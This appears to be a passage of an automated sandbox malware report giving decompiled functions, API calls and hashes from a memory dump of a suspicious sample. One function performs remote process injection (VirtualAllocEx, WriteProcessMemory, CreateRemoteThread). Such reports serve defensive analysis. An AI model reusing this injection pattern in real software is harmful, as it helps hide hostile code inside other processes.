Opcode Fuzzy Hash: 6dd34a849c2f346cf2e2f5751c819418c1277ca2abf746d71a13b971fa9c721c
Instruction Fuzzy Hash: ABA0121480487001814033180C0313530445800620FC40B41FCF8402D0E91D413494D3

Uniqueness

Uniqueness Score: -1.00%

Function 027220F4 Relevance: .1, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 51%

			E027220F4(void* __eax, char* __edx) {
				char* _t103;

				_t103 = __edx;
				_t39 = __eax + 1;
				 *__edx = 0xffffffff89705f71;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = 0xbadbbd;
				asm("sbb edi, 0xffffffff");
				 *__edx = ((((((((((__eax + 0x00000001) * 0x89705f41 >> 0x00000020 & 0x1fffffff) + 0xfffffffe25c17d04 + (_t39 * 0x89705f41 >> 0x0000001e) & 0x0fffffff) + 0xfffffffe25c17d04 & 0x07ffffff) + 0xfffffffe25c17d04 & 0x03ffffff) + 0xfffffffe25c17d04 & 0x01ffffff) + 0xfffffffe25c17d04 & 0x00ffffff) + 0xfffffffe25c17d04 & 0x007fffff) + 0xfffffffe25c17d04 & 0x003fffff) + 0xfffffffe25c17d04 & 0x001fffff) + 0xfffffffe25c17d04 >> 0x00000014 | 0x00000030;
				_t37 = _t103 + 1; // 0x1
				return _t37;
			}

0x027220f5
0x027220f7
0x02722119
0x02722120
0x02722131
0x0272213c
0x0272214d
0x02722158
0x02722169
0x02722174
0x02722185
0x02722190
0x027221a1
0x027221ac
0x027221bd
0x027221c8
0x027221d9
0x027221e4
0x027221f5
0x027221fd
0x02722206
0x02722208
0x0272220c

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Uniqueness

Uniqueness Score: -1.00%

Function 0272D480 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0272D480() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x2744224 = E0272D454("VariantChangeTypeEx", E0272CFEC, _t91);
				 *0x2744228 = E0272D454("VarNeg", E0272D01C, _t91);
				 *0x274422c = E0272D454("VarNot", E0272D01C, _t91);
				 *0x2744230 = E0272D454("VarAdd", E0272D028, _t91);
				 *0x2744234 = E0272D454("VarSub", E0272D028, _t91);
				 *0x2744238 = E0272D454("VarMul", E0272D028, _t91);
				 *0x274423c = E0272D454("VarDiv", E0272D028, _t91);
				 *0x2744240 = E0272D454("VarIdiv", E0272D028, _t91);
				 *0x2744244 = E0272D454("VarMod", E0272D028, _t91);
				 *0x2744248 = E0272D454("VarAnd", E0272D028, _t91);
				 *0x274424c = E0272D454("VarOr", E0272D028, _t91);
				 *0x2744250 = E0272D454("VarXor", E0272D028, _t91);
				 *0x2744254 = E0272D454("VarCmp", E0272D034, _t91);
				 *0x2744258 = E0272D454("VarI4FromStr", E0272D040, _t91);
				 *0x274425c = E0272D454("VarR4FromStr", E0272D0AC, _t91);
				 *0x2744260 = E0272D454("VarR8FromStr", E0272D118, _t91);
				 *0x2744264 = E0272D454("VarDateFromStr", E0272D184, _t91);
				 *0x2744268 = E0272D454("VarCyFromStr", E0272D1F0, _t91);
				 *0x274426c = E0272D454("VarBoolFromStr", E0272D25C, _t91);
				 *0x2744270 = E0272D454("VarBstrFromCy", E0272D2DC, _t91);
				 *0x2744274 = E0272D454("VarBstrFromDate", E0272D34C, _t91);
				_t46 = E0272D454("VarBstrFromBool", E0272D3C0, _t91);
				 *0x2744278 = _t46;
				return _t46;
			}

0x0272d48e
0x0272d4a2
0x0272d4b8
0x0272d4ce
0x0272d4e4
0x0272d4fa
0x0272d510
0x0272d526
0x0272d53c
0x0272d552
0x0272d568
0x0272d57e
0x0272d594
0x0272d5aa
0x0272d5c0
0x0272d5d6
0x0272d5ec
0x0272d602
0x0272d618
0x0272d62e
0x0272d644
0x0272d65a
0x0272d66a
0x0272d670
0x0272d677

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0272D489

Part of subcall function 0272D454: GetProcAddress.KERNEL32(00000000), ref: 0272D46D

Strings

VarMul, xrefs: 0272D505
VariantChangeTypeEx, xrefs: 0272D497
oleaut32.dll, xrefs: 0272D484
VarBstrFromCy, xrefs: 0272D639
VarBoolFromStr, xrefs: 0272D623
VarNeg, xrefs: 0272D4AD
VarAnd, xrefs: 0272D55D
VarIdiv, xrefs: 0272D531
VarAdd, xrefs: 0272D4D9
VarOr, xrefs: 0272D573
VarR8FromStr, xrefs: 0272D5E1
VarBstrFromDate, xrefs: 0272D64F
VarMod, xrefs: 0272D547
VarI4FromStr, xrefs: 0272D5B5
VarR4FromStr, xrefs: 0272D5CB
VarDiv, xrefs: 0272D51B
VarSub, xrefs: 0272D4EF
VarDateFromStr, xrefs: 0272D5F7
VarCyFromStr, xrefs: 0272D60D
VarCmp, xrefs: 0272D59F
VarNot, xrefs: 0272D4C3
VarXor, xrefs: 0272D589
VarBstrFromBool, xrefs: 0272D665

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 35b6c1bea7c5c643bcb20b2430e54f79830bee26fb1f1195ac67fe95915aead5
Instruction ID: 6d554aed66873ce5ddf87bab5eadbe6f05bf062999ba9e73e79cfa61bf2778f4
Opcode Fuzzy Hash: 35b6c1bea7c5c643bcb20b2430e54f79830bee26fb1f1195ac67fe95915aead5
Instruction Fuzzy Hash: 95413375A452345B62396AAD745852B77DAD3943103A2C43BFC0CAB701EE30BC5EDE29

Uniqueness

Uniqueness Score: -1.00%

Function 02735CD8 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58
libraryloadersynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02735CD8(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t17;
				void* _t19;
				void* _t26;
				long _t27;
				void* _t28;

				_t20 = __ecx;
				_t28 = __ecx;
				_t26 = __edx;
				_t19 = __eax;
				_t27 = 0;
				 *0x27444ec = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
				 *0x27444e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
				 *0x27444e4 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
				 *0x27444f4 = E02735A40(_t19, _t19, _t20, _t28, _t26, 0);
				 *0x27444f0 = E02735A40(_t19, _t19, _t20, _t26, _t26, 0);
				 *0x27444e0 = E02735B0C(_t19, 0x27444e4, E02735CA8, 0, 0x14);
				if( *0x27444e0 != 0) {
					_t15 =  *0x27444e0; // 0x0
					WaitForSingleObject(_t15, 0xffffffff);
					_t17 =  *0x27444e0; // 0x0
					GetExitCodeThread(_t17, 0x27444f8);
					_t27 =  *0x27444f8; // 0x0
				}
				return _t27;
			}

0x02735cd8
0x02735cdc
0x02735cde
0x02735ce0
0x02735ce2
0x02735cf9
0x02735d13
0x02735d2d
0x02735d3b
0x02735d49
0x02735d63
0x02735d6f
0x02735d73
0x02735d79
0x02735d83
0x02735d89
0x02735d8e
0x02735d8e
0x02735d9a

APIs

GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA,?,02744598,?,02744580,027362DA,02744590,ScanBuffer,02744598,0273635C,OpenSession,02744598,0273635C,00000000,00000000), ref: 02735CEE
GetProcAddress.KERNEL32(00000000,kernel32), ref: 02735CF4
GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA,?,02744598,?,02744580,027362DA,02744590,ScanBuffer,02744598,0273635C,OpenSession,02744598), ref: 02735D08
GetProcAddress.KERNEL32(00000000,kernel32), ref: 02735D0E
GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA,?,02744598,?,02744580,027362DA,02744590,ScanBuffer,02744598), ref: 02735D22
GetProcAddress.KERNEL32(00000000,kernel32), ref: 02735D28

Part of subcall function 02735A40: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,02735AC6,?,?,?,?,00000000,00000000,00000000), ref: 02735A80
Part of subcall function 02735A40: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,00000000,02735AC6), ref: 02735AA6

Part of subcall function 02735B0C: CreateRemoteThread.KERNEL32(?,00000000,00000000,047E0000,04740000,00000000,02744534), ref: 02735B58
Part of subcall function 02735B0C: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02735B68
Part of subcall function 02735B0C: ReadProcessMemory.KERNEL32(?,04740000,?,?,02744530,00000000,000000FF), ref: 02735B7E

WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA,?,02744598,?,02744580,027362DA), ref: 02735D79
GetExitCodeThread.KERNEL32(00000000,027444F8,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA,?,02744598), ref: 02735D89

Strings

kernel32, xrefs: 02735CE9, 02735D03, 02735D1D
ExitThread, xrefs: 02735D18
GetModuleHandleA, xrefs: 02735CE4
GetProcAddress, xrefs: 02735CFE

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
API String ID: 3826234517-3123223305
Opcode ID: a0e74047078f1b59ae98365a8440c590eec916cc32c32d9dc7e825e0b3a8324f
Instruction ID: 31c5c6997e3baf3ae7a8725607f30786724eadda76986577efd9db26014ae14c
Opcode Fuzzy Hash: a0e74047078f1b59ae98365a8440c590eec916cc32c32d9dc7e825e0b3a8324f
Instruction Fuzzy Hash: 7E1156B8B9032066E712BB7D6C5DA5A3BDFE7487557D0483BE121A7242CF704814AB54

Uniqueness

Uniqueness Score: -1.00%

Function 02722560 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E02722560(void* __eax, void* __fp0) {
				void* _v8;
				char _v110600;
				char _v112644;
				char _v112645;
				signed int _v112652;
				char _v112653;
				char _v112654;
				char _v112660;
				intOrPtr _v112664;
				intOrPtr _v112668;
				intOrPtr _v112672;
				struct HWND__* _v112676;
				signed short* _v112680;
				intOrPtr* _v112684;
				char _v129068;
				char _v131117;
				char _v161836;
				void* _v162091;
				signed char _v162092;
				void* _t73;
				int _t79;
				signed int _t126;
				int _t131;
				intOrPtr _t132;
				char* _t134;
				char* _t135;
				char* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t141;
				char* _t142;
				char* _t147;
				char* _t148;
				intOrPtr _t180;
				void* _t182;
				void* _t184;
				void* _t185;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t194;
				void* _t197;
				void* _t198;
				void* _t211;

				_push(__eax);
				_t73 = 0x27;
				goto L1;
				L12:
				while(_t180 != 0x2741700) {
					_t79 = E02722078(_t180);
					_t131 = _t79;
					__eflags = _t131;
					if(_t131 == 0) {
						L11:
						_t180 =  *((intOrPtr*)(_t180 + 4));
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						_t194 =  *(_t131 - 4);
						__eflags = _t194 & 0x00000001;
						if((_t194 & 0x00000001) == 0) {
							__eflags = _t194 & 0x00000004;
							if(__eflags == 0) {
								__eflags = _v112652 - 0x1000;
								if(_v112652 < 0x1000) {
									_v112664 = (_t194 & 0xfffffff0) - 4;
									_t126 = E027223BC(_t131);
									__eflags = _t126;
									if(_t126 == 0) {
										_v112645 = 0;
										 *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664;
										_t18 =  &_v112652;
										 *_t18 = _v112652 + 1;
										__eflags =  *_t18;
									}
								}
							} else {
								E02722414(_t131, __eflags, _t197);
							}
						}
						_t79 = E02722054(_t131);
						_t131 = _t79;
						__eflags = _t131;
					} while (_t131 != 0);
					goto L11;
				}
				_t132 =  *0x27437a8; // 0x7f9e0000
				while(_t132 != 0x27437a4 && _v112652 < 0x1000) {
					_t79 = E027223BC(_t132 + 0x10);
					__eflags = _t79;
					if(_t79 == 0) {
						_v112645 = 0;
						_t79 = _v112652;
						 *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *(_t132 + 0xc) & 0xfffffff0) - 0xfffffffffffffff4;
						_t27 =  &_v112652;
						 *_t27 = _v112652 + 1;
						__eflags =  *_t27;
					}
					_t132 =  *((intOrPtr*)(_t132 + 4));
				}
				if(_v112645 != 0) {
					L48:
					return _t79;
				}
				_v112653 = 0;
				_v112668 = 0;
				_t134 = E02722210(0x28,  &_v161836);
				_v112660 = 0x37;
				_v112680 = 0x2740046;
				_v112684 =  &_v110600;
				do {
					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
					_v112654 = 0;
					_t182 = 0xff;
					_t188 = _v112684;
					while(_t134 <=  &_v131117) {
						if( *_t188 > 0) {
							if(_v112653 == 0) {
								_t134 = E02722210(0x27, _t134);
								_v112653 = 1;
							}
							if(_v112654 != 0) {
								 *_t134 = 0x2c;
								_t139 = _t134 + 1;
								 *_t139 = 0x20;
								_t140 = _t139 + 1;
								__eflags = _t139 + 1;
							} else {
								 *_t134 = 0xd;
								 *((char*)(_t134 + 1)) = 0xa;
								_t147 = E027220F4(_v112668 + 1, _t134 + 2);
								 *_t147 = 0x20;
								_t148 = _t147 + 1;
								 *_t148 = 0x2d;
								 *((char*)(_t148 + 1)) = 0x20;
								_t140 = E02722210(8, E027220F4(_v112672, _t148 + 2));
								_v112654 = 1;
							}
							_t211 = _t182 - 1;
							if(_t211 < 0) {
								_t141 = E02722210(7, _t140);
							} else {
								if(_t211 == 0) {
									_t141 = E02722210(6, _t140);
								} else {
									E02723BD8( *((intOrPtr*)(_t188 - 4)),  &_v162092);
									_t141 = E02722210(_v162092 & 0x000000ff, _t140);
								}
							}
							 *_t141 = 0x20;
							_t142 = _t141 + 1;
							 *_t142 = 0x78;
							 *((char*)(_t142 + 1)) = 0x20;
							_t134 = E027220F4( *_t188, _t142 + 2);
						}
						_t182 = _t182 - 1;
						_t188 = _t188 - 8;
						if(_t182 != 0xffffffff) {
							continue;
						} else {
							goto L37;
						}
					}
					L37:
					_v112668 = _v112672;
					_v112684 = _v112684 + 0x800;
					_v112680 =  &(_v112680[0x10]);
					_t60 =  &_v112660;
					 *_t60 = _v112660 - 1;
				} while ( *_t60 != 0);
				if(_v112652 <= 0) {
					L47:
					E02722210(3, _t134);
					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
					goto L48;
				}
				if(_v112653 != 0) {
					 *_t134 = 0xd;
					_t136 = _t134 + 1;
					 *_t136 = 0xa;
					_t137 = _t136 + 1;
					 *_t137 = 0xd;
					_t138 = _t137 + 1;
					 *_t138 = 0xa;
					_t134 = _t138 + 1;
				}
				_t134 = E02722210(0x3c, _t134);
				_t184 = _v112652 - 1;
				if(_t184 >= 0) {
					_t185 = _t184 + 1;
					_v112676 = 0;
					_t189 =  &_v129068;
					L43:
					L43:
					if(_v112676 != 0) {
						 *_t134 = 0x2c;
						_t135 = _t134 + 1;
						 *_t135 = 0x20;
						_t134 = _t135 + 1;
					}
					_t134 = E027220F4( *_t189, _t134);
					if(_t134 >  &_v131117) {
						goto L47;
					}
					_v112676 =  &(_v112676->i);
					_t189 = _t189 + 4;
					_t185 = _t185 - 1;
					if(_t185 != 0) {
						goto L43;
					}
				}
				L1:
				_t198 = _t198 + 0xfffff004;
				_push(_t73);
				_t73 = _t73 - 1;
				if(_t73 != 0) {
					goto L1;
				} else {
					E02723518( &_v112644, 0x1b800);
					E02723518( &_v129068, 0x4000);
					_t79 = 0;
					_v112652 = 0;
					_v112645 = 1;
					_t180 =  *0x2741704; // 0x4930000
					goto L12;
				}
			}

0x02722563
0x02722564
0x02722564
0x00000000
0x0272263f
0x027225bf
0x027225c4
0x027225c6
0x027225c8
0x0272263c
0x0272263c
0x00000000
0x00000000
0x00000000
0x00000000
0x027225ca
0x027225ca
0x027225cf
0x027225d1
0x027225d7
0x027225d9
0x027225df
0x027225ec
0x027225f6
0x027225fe
0x02722606
0x0272260b
0x0272260d
0x0272260f
0x02722622
0x02722629
0x02722629
0x02722629
0x02722629
0x0272260d
0x027225e1
0x027225e4
0x027225e9
0x027225df
0x02722631
0x02722636
0x02722638
0x02722638
0x00000000
0x027225ca
0x0272264b
0x0272268a
0x02722658
0x0272265d
0x0272265f
0x02722661
0x02722674
0x0272267a
0x02722681
0x02722681
0x02722681
0x02722681
0x02722687
0x02722687
0x027226a5
0x02722903
0x02722909
0x02722909
0x027226ab
0x027226b4
0x027226cf
0x027226d1
0x027226db
0x027226eb
0x027226f1
0x027226fd
0x02722703
0x0272270a
0x02722715
0x02722717
0x02722728
0x02722735
0x02722748
0x0272274a
0x0272274a
0x02722758
0x027227a9
0x027227ac
0x027227ad
0x027227b0
0x027227b0
0x0272275a
0x0272275a
0x0272275e
0x02722770
0x02722772
0x02722775
0x02722776
0x0272277a
0x0272279e
0x027227a0
0x027227a0
0x027227b3
0x027227b6
0x027227cd
0x027227b8
0x027227b8
0x027227e2
0x027227ba
0x027227ef
0x02722808
0x02722808
0x027227b8
0x0272280a
0x0272280d
0x0272280e
0x02722812
0x0272281f
0x0272281f
0x02722821
0x02722822
0x02722828
0x00000000
0x00000000
0x00000000
0x00000000
0x02722828
0x0272282e
0x02722834
0x0272283a
0x02722844
0x0272284b
0x0272284b
0x0272284b
0x0272285e
0x027228da
0x027228e6
0x027228fe
0x00000000
0x027228fe
0x02722867
0x02722869
0x0272286c
0x0272286d
0x02722870
0x02722871
0x02722874
0x02722875
0x02722878
0x02722878
0x0272288a
0x02722892
0x02722895
0x02722897
0x02722898
0x027228a2
0x00000000
0x027228a8
0x027228af
0x027228b1
0x027228b4
0x027228b5
0x027228b8
0x027228b8
0x027228c2
0x027228cc
0x00000000
0x00000000
0x027228ce
0x027228d4
0x027228d7
0x027228d8
0x00000000
0x00000000
0x027228d8
0x02722569
0x02722569
0x0272256f
0x02722570
0x02722571
0x00000000
0x02722573
0x0272258c
0x0272259e
0x027225a3
0x027225a5
0x027225ab
0x027225b2
0x00000000
0x027225b2

APIs

MessageBoxA.USER32 ref: 027228FE

Strings

String, xrefs: 027227D1
An unexpected memory leak has occurred. , xrefs: 027226C0
, xrefs: 02722844
Unexpected Memory Leak, xrefs: 027228F0
Unknown, xrefs: 027227BC
bytes: , xrefs: 0272278D
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02722879
The unexpected small block leaks are:, xrefs: 02722737
7, xrefs: 027226D1

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 2781f49bf1161c1f19bab3896efdc730cbaf165a87f23cc5ffd1cb36a01e9189
Instruction ID: dd5ce50cf35e07e8cf34d11a9193b1d737ef04ed5f9aaea1869442af609b65a0
Opcode Fuzzy Hash: 2781f49bf1161c1f19bab3896efdc730cbaf165a87f23cc5ffd1cb36a01e9189
Instruction Fuzzy Hash: 74A1B330B042748FDB22AA2CC884B99B6E5EB09714F1441E5ED49AB347CB75C9CDCF51

Uniqueness

Uniqueness Score: -1.00%

Function 02723154 Relevance: 15.1, APIs: 10, Instructions: 129
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E02723154(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x27230a8;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E027230E8;
				}
				_t59[9] = E02723134;
				_t59[8] = E027230E4;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E027230E4;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x27413e0) {
							_t31 = GetStdHandle(0xfffffff5);
						} else {
							_t31 = GetStdHandle(0xfffffff4);
						}
					} else {
						_t31 = GetStdHandle(0xfffffff6);
					}
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E027230E8;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}

0x02723155
0x02723159
0x0272315c
0x02723168
0x02723175
0x0272317a
0x0272317f
0x02723184
0x0272316a
0x0272316b
0x0272318d
0x02723192
0x02723197
0x0272316d
0x0272316e
0x00000000
0x00000000
0x0272319e
0x027231a3
0x027231a8
0x027231a8
0x027231ad
0x027231ad
0x027231b4
0x027231bb
0x027231c6
0x02723284
0x0272328b
0x02723292
0x0272329b
0x027232a7
0x027232af
0x027232a9
0x027232af
0x027232af
0x0272329d
0x027232af
0x027232af
0x027232b7
0x00000000
0x00000000
0x027232b9
0x00000000
0x027231cc
0x027231dc
0x027231e4
0x027232f2
0x027232f2
0x00000000
0x027232f8
0x027231ea
0x027231f2
0x027232bb
0x027232c1
0x027232da
0x00000000
0x027232da
0x027232c5
0x027232cc
0x027232e0
0x027232e5
0x00000000
0x027232eb
0x027232d1
0x027232d3
0x027232d3
0x00000000
0x027232d1
0x027231f8
0x02723205
0x02723206
0x00000000
0x00000000
0x0272320c
0x02723211
0x02723213
0x02723213
0x02723222
0x00000000
0x02723228
0x0272323d
0x02723242
0x02723244
0x00000000
0x00000000
0x0272324a
0x0272324c
0x02723258
0x0272326c
0x00000000
0x0272327c
0x00000000
0x0272327c
0x0272326c
0x0272325a
0x0272325a
0x00000000
0x0272324c
0x02723222

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 027231DC
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 02723200
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0272321C
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 0272323D
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 02723266
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 02723274
GetStdHandle.KERNEL32(000000F5), ref: 027232AF
GetFileType.KERNEL32(?,000000F5), ref: 027232C5
CloseHandle.KERNEL32(?,?,000000F5), ref: 027232E0
GetLastError.KERNEL32(000000F5), ref: 027232F8

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: 40ce03527bbab8658744a25cc348c38e9ec65c2771329dc4f8255c795ef4ae25
Instruction ID: b29c1dc173ea143d9ca3cee3cddf2c6dbae7297688a329f8bb39752f7ac6d852
Opcode Fuzzy Hash: 40ce03527bbab8658744a25cc348c38e9ec65c2771329dc4f8255c795ef4ae25
Instruction Fuzzy Hash: A641D2302007B0AAF7309F28C909B2376E6FB05754F608AADD1EA965D0D77EA44DCB90

Uniqueness

Uniqueness Score: -1.00%

Function 0272255E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0272255E(void* __eax) {
				void* _v8;
				char _v110600;
				char _v112644;
				char _v112645;
				signed int _v112652;
				char _v112653;
				char _v112654;
				char _v112660;
				intOrPtr _v112664;
				intOrPtr _v112668;
				intOrPtr _v112672;
				struct HWND__* _v112676;
				signed short* _v112680;
				intOrPtr* _v112684;
				char _v129068;
				char _v131117;
				char _v161836;
				void* _v162091;
				signed char _v162092;
				void* _t73;
				int _t79;
				signed int _t126;
				int _t131;
				intOrPtr _t132;
				char* _t134;
				char* _t135;
				char* _t136;
				char* _t137;
				char* _t138;
				char* _t139;
				char* _t141;
				char* _t142;
				char* _t147;
				char* _t148;
				intOrPtr _t180;
				void* _t182;
				void* _t184;
				void* _t185;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t194;
				void* _t198;
				void* _t200;
				void* _t214;

				_t198 = _t200;
				_push(__eax);
				_t73 = 0x27;
				goto L2;
				L13:
				while(_t180 != 0x2741700) {
					_t79 = E02722078(_t180);
					_t131 = _t79;
					__eflags = _t131;
					if(_t131 == 0) {
						L12:
